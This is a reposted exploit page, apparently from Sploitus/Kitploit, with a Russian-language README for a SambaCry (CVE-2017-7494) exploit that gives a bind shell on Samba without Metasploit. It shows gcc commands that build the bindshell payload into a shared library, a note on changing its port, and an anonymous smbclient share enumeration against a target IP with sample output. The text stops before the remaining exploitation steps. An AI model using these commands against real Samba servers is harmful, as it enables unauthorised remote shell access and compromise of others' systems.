Sploitus

Exploit for CVE-2017-7494_SambaCry

kitploit · 2026-08-27

Exploit Code

MARKDOWN50 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-D3FUDD-CVE-2017-7494_SAMBACRY
# CVE-2017-7494 SambaCry Exploit

Эксплойт SambaCry (CVE-2017-7494) для атаки на Samba (bind shell без Metasploit)

Если нужно изменить порт, просто измените строку 68 в _bindshell-samba.c_ и перекомпилируйте:  
![image](https://assets.kitploit.com/production/public/readmes/24363/5b83534772f7622185930827fdde2115a86ae69c64f7bedd72c87ee607c38ade.png)

root@kitploit:~
    
    
    gcc -c -fpic bindshell-samba.c
    

root@kitploit:~
    
    
    gcc -shared -o libbindshell-samba.so bindshell-samba.o
    

  


**Как эксплуатировать:**  


Посмотрите общие ресурсы (в этом примере мы используем анонимного пользователя):

root@kitploit:~
    
    
    smbclient -L //192.168.10.131/ -U "" -N
    

root@kitploit:~
    
    
    	Sharename       Type      Comment
    	---------       ----      -------
    	print$          Disk      Драйверы принтера
    	publico         Disk      Publico
    	IPC$            IPC       IPC Service (maq131 server (Samba, Ubuntu))
    Reconnecting with SMB1 for workgroup listing.
    
    	Server               Comment
    	---------            -------
    
    	Workgroup            Master
    	---------            -------
    	WORKGROUP            CHORA